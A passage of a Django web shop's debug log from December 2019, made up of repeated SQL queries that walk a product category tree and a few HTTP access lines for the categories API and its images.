"shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 11:27:39,352 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 11:27:39,354 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 11:27:39,356 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 11:27:39,359 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 11:27:39,361 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 11:27:39,363 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 11:27:39,366 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 11:27:39,368 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 11:27:39,371 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 11:27:39,373 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 11:27:39,375 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 11:27:39,377 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 11:27:39,380 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 11:27:39,383 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 11:27:39,385 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 11:27:39,387 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 11:27:39,390 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 11:27:39,392 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 11:27:39,394 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 11:27:39,397 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 11:27:39,399 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 11:27:39,401 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 11:27:39,404 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 11:27:39,406 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 11:27:39] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [19/Dec/2019 11:27:40] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 [19/Dec/2019 11:27:40] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 [19/Dec/2019 11:28:10] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-19 11:29:54,772 utils 4252 140031721535232 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 11:29:54,780 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 11:29:54,784 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 11:29:54,787 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 11:29:54,793 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 11:29:54,796 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 11:29:54,799 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 11:29:54,802 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 11:29:54,805 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 11:29:54,809 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 11:29:54,812 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 11:29:54,815 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 11:29:54,818 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 11:29:54,821 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 11:29:54,825 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 11:29:54,828 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 11:29:54,831 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 11:29:54,834 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 11:29:54,837 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 11:29:54,842 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 11:29:54,845 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 11:29:54,848 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 11:29:54,851 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 11:29:54,854 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 11:29:54,857 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 11:29:54,862 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 11:29:54,864 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 11:29:54,867 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 11:29:54,870 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 11:29:54,874 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 11:29:54,879 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 11:29:54,882 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 11:29:54,884 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 11:29:54,888 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 11:29:54,891 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 11:29:54,897 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 11:29:54,900 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 11:29:54,903 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 11:29:54,906 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 11:29:54,910 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 11:29:54,914 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 11:29:54,919 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 